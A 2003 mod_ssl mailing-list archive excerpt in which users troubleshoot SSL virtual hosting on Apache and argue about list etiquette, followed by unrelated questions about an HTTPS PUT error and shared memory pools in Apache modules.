>That doesn't make me one bit of a better person than you... it just  
>says that my mind works in a way that is different from yours.  I'd  
>wager there are certain tasks you accomplish quite easily that would  
>take me some effort.  It's the way us humans seem to be designed.
>
>Every once in awhile, it's a good thing to look at who we are 
>and what  
>we're good at and then review what we've chosen to do in life. 
> Doing a  
>job that meshes well with how you think can be all the difference  
>between looking forward to an rewarding day at the office and 
>a bruised  
>forehead from repeatedly smashing your head against a wall in  
>self-frustration.  [ of course, I'm omitting the forehead bruising  
>caused by external influences like PHBs ;-) ]   As for the 
>tone of your  
>note .. life's tough, grab a helmet.
>
>Kind Regards,
>-dsp
>
>On Thursday, Aug 21, 2003, at 00:05 US/Eastern, Ian Newlands wrote:
>
>> If I hadn't already exhausted resources I would not have made this  
>> post in the first place.  I have tried 3 different versions 
>of apache,  
>> searched through previous postings, used search engines etc. 
>bought 2  
>> books on apache and have been attempting to get this going 
>for almost  
>> 2 months now.
>>
>> I'm glad you're amused by my frustration here.
>>
>> If there is anyone out there that is willing to submit a serious  
>> response to this I would appreciate it greatly.
>>
>> Regards,
>>
>> Ian Newlands
>>
>>
>> ----- Original Message -----
>> From: "Dave Paris" 
>> To: 
>> Cc: "Ian Newlands" 
>> Sent: Thursday, August 21, 2003 11:58 AM
>> Subject: Re: virtual hosting
>>
>>
>>> geeze.  is it that time of the month already for this question?   
>>> seems like it was just yesterday when it was asked last .. 
>maybe I'm  
>>> just thinking of the other 100,000 times it was asked.
>>>
>>> in all seriousness, this dead horse has been beaten so many 
>times on  
>>> this list there isn't even a carcass left to hit at this point.   
>>> please go dig through the mail list archives to see why name-based  
>>> virtual hosts don't work with SSL.
>>>
>>> yes, that's a flippant answer.  no, you're not likely to 
>get a reply  
>>> any more serious.
>>>
>>> -dsp
>>>
>>> On Wednesday, Aug 20, 2003, at 22:09 US/Eastern, Ian Newlands wrote:
>>>
>>> > I am currently running about 15 virtual hosts using name 
>based on  
>>> port > 80, and 1 virtual host using SSL.
>>> >
>>> > My SSL host is currently working with the following:
>>> >
>>> >    
>>> >
>>> > However I want to change this to the IP based hosting for this  
>>> host, > allowing me to then add more SSL based virtual 
>hosts on this  
>>> setup, so > I tried changing this to the following:
>>> >
>>> >    
>>> >
>>> > By doing this my SSL virtual host stops working altogether.
>>> >
>>> > I try the following to debug it on a remote machine:
>>> >
>>> >    # openssl s_client -connect 203.xxx.xxx.xxx:443
>>> >    CONNECTED(00000003)
>>> >    27604:error:140770FC:SSL 
>routines:SSL23_GET_SERVER_HELLO:unknown  
>>> > protocol:s23_clnt.c:475:
>>> >
>>> > I do the exact same thing on the local machine and it 
>responds with  
>>> a > valid SSL response.
>>> >
>>> > Can anyone suggest might be wrong here?
>>> >
>>> > Regards,
>>> >
>>> > Ian Newlands
>>> >
>>> > _________________________________________________________________
>>> > Hotmail is now available on Australian mobile phones. Go to  >  
>>> http://ninemsn.com.au/mobilecentral/signup.asp
>>> >
>>> >  
>>> 
>______________________________________________________________________
>>> > Apache Interface to OpenSSL (mod_ssl)                    
>>> www.modssl.org
>>> > User Support Mailing List                       
>>> modssl-users@modssl.org
>>> > Automated List Manager                             
>>> majordomo@modssl.org
>>> >
>>>
>>>
>>>
>>
>> _________________________________________________________________
>> Hot chart ringtones and polyphonics. Go to   
>> http://ninemsn.com.au/mobilemania/default.asp
>>
>>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 18:12:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BE437A8967; Thu, 21 Aug 2003 18:12:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imbaspam-ny03.ssmb.com (mail1.ssmb.com [199.67.139.25])
	by master.modssl.org (Postfix) with ESMTP id 63756A893B
	for ; Thu, 21 Aug 2003 18:12:32 +0200 (CEST)
Received: from imbarc-ny02.ny.ssmb.com (imbarc-ny02-1 [162.124.186.139])
	by imbaspam-ny03.ssmb.com (8.12.10.Beta2/8.12.10.Beta2/SSMB_EXT/evision: 1.26 $) with ESMTP id h7LGCUOP002553
	for ; Thu, 21 Aug 2003 12:12:31 -0400 (EDT)
Received: from mailhub-nyc3.ny.ssmb.com (mailhub-nyc3-hme0.ny.ssmb.com [162.124.148.17])
	by imbarc-ny02.ny.ssmb.com (8.12.9/8.12.9/SSMB_QQQ_IN/1.1) with ESMTP id h7LGCGYJ004975
	for ; Thu, 21 Aug 2003 12:12:16 -0400 (EDT)
Received: from exnjsm02.nam.nsroot.net (exnjsm02.nam.nsroot.net [150.110.188.173])
	by mailhub-nyc3.ny.ssmb.com (8.9.3-GEMSp2/8.9.3/SSMB-HUB) with ESMTP id MAA07167
	for ; Thu, 21 Aug 2003 12:12:15 -0400 (EDT)
content-class: urn:content-classes:message
Subject: HTTPS Unknown Error
Date: Thu, 21 Aug 2003 12:12:09 -0400
MIME-Version: 1.0
Message-ID: <9F1AE1497901D71185A20002A56B9B2601B0FE75@EXCHNY43>
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.6334.0
Thread-Index: AcNn4eND25Vp7+hVTcilmejqABBVBwAHMGLg
From: "Nauman, Ahmed [IT]" 
To: 
X-Scanned-By: MIMEDefang 2.36
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nauman, Ahmed [IT]" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All,

I receive this error "HTTPS Unknown Error" with error code 500 from the =
apache server when i try to make a PUT request through HTTPS. Are their =
any specific reasons of that ? I have a test application which gets 204 =
response from the same server but our live application gets 500 response =
code. This seems confusing - anyone with help will be highly =
appreciated.

Regards,
NK

-----Original Message-----
From: Boyle Owen [mailto:Owen.Boyle@swx.com]
Sent: Thursday, August 21, 2003 7:43 AM
To: modssl-users@modssl.org
Subject: RE:


>-----Original Message-----
>From: Dave Paris [mailto:dparis@w3works.com]
>
> snip...  You claim to =20
>have spent two MONTHS trying to find what I found in under 10=20
>SECONDS.

Er... the difference is that you recognised the problem immediately
because you have seen it before. So you knew exactly what to type into
Google.

If you put yourself in Ian's shoes, he was using the NBVH mechanism for
ages and became very familiar with it. He then tried to extend it to
SSL, which is a reasonable thing to do, and then was suprised that it
didn't work. It is not blindingly obvious, a priori, what the problem
is. In that case, it is not so obvious what to type into Google - you
might not necessarily realise that the problem is to do with NBVH,
especially if that is not the only thing you changed.

I am making this comment because I followed a very similar route to Ian
in discovering this SSL limitation. In my case, I was tasked by my boss,
who is a competent programmer, to "set up some NBVHs under SSL". It
never occurred to me that my boss could have handed me an impossible
task and I spent weeks trying to get it to work. In the end, it was this
mailing list which enlightened me.

Since then, I've tried to help out on the list, initially by explaining
this issue whenever it came up but lately (since others also now do this
quite ably), by chipping in whenever some bright spark reckons that he's
found a workaround (it's a bit like debunking perpetual motion machine
designs). Usually, he's forgotten about authentication and is using the
same cert in all VHs...

Anyway, the point I'm making is that the original poster is obviously a
seasoned hacker (he uses openssl from the command line!) and as such
should be welcome on this list and congratulated for using mod_ssl... So
could we be a bit friendlier please?

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20





>That doesn't make me one bit of a better person than you... it just =20
>says that my mind works in a way that is different from yours.  I'd =20
>wager there are certain tasks you accomplish quite easily that would =20
>take me some effort.  It's the way us humans seem to be designed.
>
>Every once in awhile, it's a good thing to look at who we are=20
>and what =20
>we're good at and then review what we've chosen to do in life.=20
> Doing a =20
>job that meshes well with how you think can be all the difference =20
>between looking forward to an rewarding day at the office and=20
>a bruised =20
>forehead from repeatedly smashing your head against a wall in =20
>self-frustration.  [ of course, I'm omitting the forehead bruising =20
>caused by external influences like PHBs ;-) ]   As for the=20
>tone of your =20
>note .. life's tough, grab a helmet.
>
>Kind Regards,
>-dsp
>
>On Thursday, Aug 21, 2003, at 00:05 US/Eastern, Ian Newlands wrote:
>
>> If I hadn't already exhausted resources I would not have made this =20
>> post in the first place.  I have tried 3 different versions=20
>of apache, =20
>> searched through previous postings, used search engines etc.=20
>bought 2 =20
>> books on apache and have been attempting to get this going=20
>for almost =20
>> 2 months now.
>>
>> I'm glad you're amused by my frustration here.
>>
>> If there is anyone out there that is willing to submit a serious =20
>> response to this I would appreciate it greatly.
>>
>> Regards,
>>
>> Ian Newlands
>>
>>
>> ----- Original Message -----
>> From: "Dave Paris" 
>> To: 
>> Cc: "Ian Newlands" 
>> Sent: Thursday, August 21, 2003 11:58 AM
>> Subject: Re: virtual hosting
>>
>>
>>> geeze.  is it that time of the month already for this question?  =20
>>> seems like it was just yesterday when it was asked last ..=20
>maybe I'm =20
>>> just thinking of the other 100,000 times it was asked.
>>>
>>> in all seriousness, this dead horse has been beaten so many=20
>times on =20
>>> this list there isn't even a carcass left to hit at this point.  =20
>>> please go dig through the mail list archives to see why name-based =20
>>> virtual hosts don't work with SSL.
>>>
>>> yes, that's a flippant answer.  no, you're not likely to=20
>get a reply =20
>>> any more serious.
>>>
>>> -dsp
>>>
>>> On Wednesday, Aug 20, 2003, at 22:09 US/Eastern, Ian Newlands wrote:
>>>
>>> > I am currently running about 15 virtual hosts using name=20
>based on =20
>>> port > 80, and 1 virtual host using SSL.
>>> >
>>> > My SSL host is currently working with the following:
>>> >
>>> >    
>>> >
>>> > However I want to change this to the IP based hosting for this =20
>>> host, > allowing me to then add more SSL based virtual=20
>hosts on this =20
>>> setup, so > I tried changing this to the following:
>>> >
>>> >    
>>> >
>>> > By doing this my SSL virtual host stops working altogether.
>>> >
>>> > I try the following to debug it on a remote machine:
>>> >
>>> >    # openssl s_client -connect 203.xxx.xxx.xxx:443
>>> >    CONNECTED(00000003)
>>> >    27604:error:140770FC:SSL=20
>routines:SSL23_GET_SERVER_HELLO:unknown =20
>>> > protocol:s23_clnt.c:475:
>>> >
>>> > I do the exact same thing on the local machine and it=20
>responds with =20
>>> a > valid SSL response.
>>> >
>>> > Can anyone suggest might be wrong here?
>>> >
>>> > Regards,
>>> >
>>> > Ian Newlands
>>> >
>>> > _________________________________________________________________
>>> > Hotmail is now available on Australian mobile phones. Go to  > =20
>>> http://ninemsn.com.au/mobilecentral/signup.asp
>>> >
>>> > =20
>>>=20
>______________________________________________________________________
>>> > Apache Interface to OpenSSL (mod_ssl)                   =20
>>> www.modssl.org
>>> > User Support Mailing List                      =20
>>> modssl-users@modssl.org
>>> > Automated List Manager                            =20
>>> majordomo@modssl.org
>>> >
>>>
>>>
>>>
>>
>> _________________________________________________________________
>> Hot chart ringtones and polyphonics. Go to  =20
>> http://ninemsn.com.au/mobilemania/default.asp
>>
>>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 21:58:02 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3F183A8965; Thu, 21 Aug 2003 21:58:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mystic1.trustcenter.de (mystic1.trustcenter.de [193.194.157.34])
	by master.modssl.org (Postfix) with ESMTP id 05AD1A893B
	for ; Thu, 21 Aug 2003 21:58:01 +0200 (CEST)
Received: (from root@localhost)
	by mystic1.trustcenter.de (8.11.6+Sun/8.11.6) id h7LJvuD04410
	for ; Thu, 21 Aug 2003 21:57:56 +0200 (MEST)
Received: from venus.trustcenter.de(192.168.202.4) by mystic1.trustcenter.de via csmap (V6.0)
	id srcAAAnBaaNi; Thu, 21 Aug 03 21:57:55 +0200
Received: from trustcenter.de (titan.trustcenter.de [192.168.200.244])
	by venus.trustcenter.de (8.11.0/8.11.0) with ESMTP id h7LJvsa19672;
	Thu, 21 Aug 2003 21:57:55 +0200 (MET DST)
Message-ID: <3F452442.70600@trustcenter.de>
Date: Thu, 21 Aug 2003 21:57:54 +0200
From: =?ISO-8859-1?Q?G=F6tz_Babin-Ebell?= 
Organization: TC TrustCenter AG
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624
X-Accept-Language: de-de, de, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 
References: 
In-Reply-To: 
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms090907060606020408050606"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?G=F6tz_Babin-Ebell?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms090907060606020408050606
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hello Owen,

Boyle Owen wrote:
>>-----Original Message-----
>>From: Dave Paris [mailto:dparis@w3works.com]
>>
>>snip...  You claim to  
>>have spent two MONTHS trying to find what I found in under 10 
>>SECONDS.

> Anyway, the point I'm making is that the original poster is obviously a
> seasoned hacker (he uses openssl from the command line!) and as such
> should be welcome on this list and congratulated for using mod_ssl... So
> could we be a bit friendlier please?

Especially since that what he wanted to do seems to be IP based VH...

>>>>>I am currently running about 15 virtual hosts using name 
>>>>>based on port 80, and 1 virtual host using SSL.
>>>>

Please read:

>>>>>My SSL host is currently working with the following:
>>>>>
>>>>>   
>>>>>
>>>>>However I want to change this to the IP based hosting for this  
>>>>>host, allowing me to then add more SSL based virtual 
>>>>>hosts on this setup, so I tried changing this to the following:
>>>>
>>>>>   
[...]
>>>>>By doing this my SSL virtual host stops working altogether.

Seems he knows that NBVH is not possible,
and got his IP based VH wrong...

>>>>>I try the following to debug it on a remote machine:
>>>>>
>>>>>   # openssl s_client -connect 203.xxx.xxx.xxx:443
>>>>>   CONNECTED(00000003)
>>>>>   27604:error:140770FC:SSL 

With such problems it is best do do an
telnet 203.xxx.xxx.xxx 443
to test if the server suddenly wants to speak plain HTTP...

>>>>>I do the exact same thing on the local machine and it 
>>>>>responds with a valid SSL response.
>>>>
>>>>>Can anyone suggest might be wrong here?

Sorry, not me...

Bye

Goetz

-- 
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0,  Fax: +49-(0)40 80 80 26 -126

--------------ms090907060606020408050606
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIIkDCC
BEQwggOtoAMCAQICDwCQHgAAAAJOQu0jEgf3pTANBgkqhkiG9w0BAQUFADCBvDELMAkGA1UE
BhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoTMVRD
IFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAgBgNV
BAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRpZmlj
YXRlQHRydXN0Y2VudGVyLmRlMB4XDTAzMDIxMDE0NDI1MFoXDTA0MDIxMDE0NDI1MFowgaox
CzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMRowGAYD
VQQKExFUQyBUcnVzdENlbnRlciBBRzEUMBIGA1UECxMLRW50d2lja2x1bmcxGjAYBgNVBAMT
EUdvZXR6IEJhYmluLUViZWxsMSkwJwYJKoZIhvcNAQkBFhpiYWJpbi1lYmVsbEB0cnVzdGNl
bnRlci5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALB6adN6EChrpAbT5KV1
ceRRIDAoGnz2gsBoFI2BwJLS+RpuIZfdJOepm4crg3X6LXrMKwSF/lshFeHrVPtLzabgLGyF
SujsJP0z3u7f4XNYCGHl4UbyPkYboIP9GC/DRtsknO1YfJUy/4yKBG4VjJ4AP6vZTEQey6jm
xelsK2ek4vwRfUjs/z9UcZmtj4ipiHP6IqFyydDTLarn1jWHUu2zFnJzryZ6mXdOUPihCOFG
D+c1KFksZ1VscgDpKygTQcIg/VItmbeFkhOj9IkboOyiVKvvfhujlxmdm9ACt22MjMrB0RAb
9TR1DgXlyofwykKAK+GM8Cu8jcKaJjvfhaMCAwEAAaOB0zCB0DAMBgNVHRMBAf8EAjAAMA4G
A1UdDwEB/wQEAwIF4DA+BglghkgBhvhCAQgEMRYvaHR0cDovL3d3dy50cnVzdGNlbnRlci5k
ZS9ndWlkZWxpbmVzL2luZGV4Lmh0bWwwEQYJYIZIAYb4QgEBBAQDAgWgMF0GCWCGSAGG+EIB
AwRQFk5odHRwczovL3d3dy50cnVzdGNlbnRlci5kZS9jZ2ktYmluL2NoZWNrLXJldi5jZ2kv
OTAxRTAwMDAwMDAyNEU0MkVEMjMxMjA3RjdBNT8wDQYJKoZIhvcNAQEFBQADgYEAObOwuCFG
0HmVvCm8llpJ3qsBqtZgFyUT0wuz8JG6CZjHn5lwvOg+8m8huKrE5oGEQIo9EwLcFLDNVsxB
CiwjX2juU3JQl2Hs2smUyHkOqg+W0COetRp+PcDAk4hk0Mth5A3bDy3FrzyhbjpYjAZTvnsY
9+QYmJm5cGWBJK9I7kIwggREMIIDraADAgECAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcN
AQEFBQAwgbwxCzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1i
dXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3
b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZI
hvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNlbnRlci5kZTAeFw0wMzAyMTAxNDQyNTBaFw0w
NDAyMTAxNDQyNTBaMIGqMQswCQYDVQQGEwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UE
BxMHSGFtYnVyZzEaMBgGA1UEChMRVEMgVHJ1c3RDZW50ZXIgQUcxFDASBgNVBAsTC0VudHdp
Y2tsdW5nMRowGAYDVQQDExFHb2V0eiBCYWJpbi1FYmVsbDEpMCcGCSqGSIb3DQEJARYaYmFi
aW4tZWJlbGxAdHJ1c3RjZW50ZXIuZGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCwemnTehAoa6QG0+SldXHkUSAwKBp89oLAaBSNgcCS0vkabiGX3STnqZuHK4N1+i16zCsE
hf5bIRXh61T7S82m4CxshUro7CT9M97u3+FzWAhh5eFG8j5GG6CD/Rgvw0bbJJztWHyVMv+M
igRuFYyeAD+r2UxEHsuo5sXpbCtnpOL8EX1I7P8/VHGZrY+IqYhz+iKhcsnQ0y2q59Y1h1Lt
sxZyc68mepl3TlD4oQjhRg/nNShZLGdVbHIA6SsoE0HCIP1SLZm3hZITo/SJG6DsolSr734b
o5cZnZvQArdtjIzKwdEQG/U0dQ4F5cqH8MpCgCvhjPArvI3CmiY734WjAgMBAAGjgdMwgdAw
DAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwPgYJYIZIAYb4QgEIBDEWL2h0dHA6Ly93
d3cudHJ1c3RjZW50ZXIuZGUvZ3VpZGVsaW5lcy9pbmRleC5odG1sMBEGCWCGSAGG+EIBAQQE
AwIFoDBdBglghkgBhvhCAQMEUBZOaHR0cHM6Ly93d3cudHJ1c3RjZW50ZXIuZGUvY2dpLWJp
bi9jaGVjay1yZXYuY2dpLzkwMUUwMDAwMDAwMjRFNDJFRDIzMTIwN0Y3QTU/MA0GCSqGSIb3
DQEBBQUAA4GBADmzsLghRtB5lbwpvJZaSd6rAarWYBclE9MLs/CRugmYx5+ZcLzoPvJvIbiq
xOaBhECKPRMC3BSwzVbMQQosI19o7lNyUJdh7NrJlMh5DqoPltAjnrUafj3AwJOIZNDLYeQN
2w8txa88oW46WIwGU757GPfkGJiZuXBlgSSvSO5CMYIEdzCCBHMCAQEwgdAwgbwxCzAJBgNV
BAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFU
QyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYD
VQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZp
Y2F0ZUB0cnVzdGNlbnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMAkGBSsOAwIaBQCgggJ7MBgG
CSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAzMDgyMTE5NTc1NFow
IwYJKoZIhvcNAQkEMRYEFJquSNC1fJ468feFjrkxDEG4AEwtMFIGCSqGSIb3DQEJDzFFMEMw
CgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0G
CCqGSIb3DQMCAgEoMIHhBgkrBgEEAYI3EAQxgdMwgdAwgbwxCzAJBgNVBAYTAkRFMRAwDgYD
VQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRl
ciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVz
dENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNl
bnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMIHjBgsqhkiG9w0BCRACCzGB06CB0DCBvDELMAkG
A1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoT
MVRDIFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAg
BgNVBAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRp
ZmljYXRlQHRydXN0Y2VudGVyLmRlAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcNAQEBBQAE
ggEAewG5eGCI1vd347s/t4ehFExVe5ROh/3/PKdnbjiJLJfMKzKD0K9uyEeRo8D/Gwe501SV
RwVXXBAAZVuCbDN6tx/E9BFntDsEZbvPOnG/CP2VR3p89Q/Fdk8gOkp+61zfzGO7cijL9DVB
5p1r2b8Je6UOn29eyEuw9CUThRUVdGwbRT5FpdFD8sohHMVUjsW1LBFqyb7IfDI7/s/9Bo1E
jO801TE0MM7Fe7nmp/zkHMWW5YrQHw7viyu9XcK8MhjC0IEdNRKT867C3y6zce6yeYwzeCiP
KjVl76zpK2MGkdHeehjlCw7TToiqcyWJjmW78TZYC4FO5DKXG1FpzyzH7QAAAAAAAA==
--------------ms090907060606020408050606--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 23:10:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0C4D3A8967; Thu, 21 Aug 2003 23:10:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from outreach.wolfnet.org (adsl-66.51.222.166.dslextreme.com [66.51.222.166])
	by master.modssl.org (Postfix) with ESMTP id BF729A8947
	for ; Thu, 21 Aug 2003 23:10:55 +0200 (CEST)
Received: from outreach ([10.0.0.2])
	by outreach.wolfnet.org with esmtp (TLSv1:AES256-SHA:256)
	(Exim 4.20)
	id 19pwhq-000CBn-J4
	for modssl-users@modssl.org; Thu, 21 Aug 2003 14:10:54 -0700
Date: Thu, 21 Aug 2003 14:10:50 -0700 (PDT)
From: "Jason K. Fritcher" 
To: modssl-users@modssl.org
Subject: Making Shared Pools
Message-ID: <20030821140553.P41781@outreach.wolfnet.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jason K. Fritcher" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


I'm writing an Apache module that needs to be able to create a user
configurable sized shared memory pool. After looking at the EAPI_MM docs, I
see I can make the shared memory segment, but I can't find anyway to convert
it into a pool so I can use any of Apache's pool functions with it. Is there
a way to create new shared pools, or is the initial shared pool the only one
available?

Thanks.

- -- 
 Jason K. Fritcher
  jkf@wolfnet.org

pub  1024D/85D1A012 2003-03-04 Jason K. Fritcher 
     Key fingerprint = AFA3 B816 DECD AC49 4B40  0C28 38F8 83E0 85D1 A012

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (FreeBSD)
Comment: http://www.wolfnet.org/~jkf/jkf.asc

iD8DBQE/RTVdOPiD4IXRoBIRAvucAKCugJMtkxhMRELE3zoCYqIyFMYOtwCgjuCt
cpj00mtNXPERajnlTAcqfy4=
=dM8I
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 22 04:05:02 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BA2FFA8959; Fri, 22 Aug 2003 04:05:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (law10-f48.law10.hotmail.com [64.4.15.48])
	by master.modssl.org (Postfix) with ESMTP id BD1C3A8935
	for ; Fri, 22 Aug 2003 04:05:00 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 21 Aug 2003 18:53:28 -0700
Received: from 203.59.129.168 by lw10fd.law10.hotmail.msn.com with HTTP;
	Fri, 22 Aug 2003 01:53:28 GMT
X-Originating-IP: [203.59.129.168]
X-Originating-Email: [iannewlands@hotmail.com]
From: "Ian Newlands" 
To: modssl-users@modssl.org
Cc: dparis@w3works.com
Date: Fri, 22 Aug 2003 09:53:28 +0800
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 22 Aug 2003 01:53:28.0646 (UTC) FILETIME=[2EAFEE60:01C36850]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ian Newlands" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dave

Thank you for your reply, it was most enlightening and yes I will re-assess 
my future as a human being.  Hopefully that statement somehow makes you feel 
better about yourself.

Now with all that said and done, let's get back to my actual question, 
that's what this discussion list is about is it not? :)

My question quite clearly stated that I was attempting IP based hosting for 
my SSL based virtual host.  I am assuming that you quite clearly did not 
actually read my email prior to your public abuse of my standing as a human 
being.

Please read the following quote from my initial email very carefully.

>My SSL host is currently working with the following:
>    
>
>However I want to change this to the IP based hosting for this  host, 
>allowing me to then add more SSL based virtual hosts on this  setup, so I 
>tried changing this to the following:
>
>    
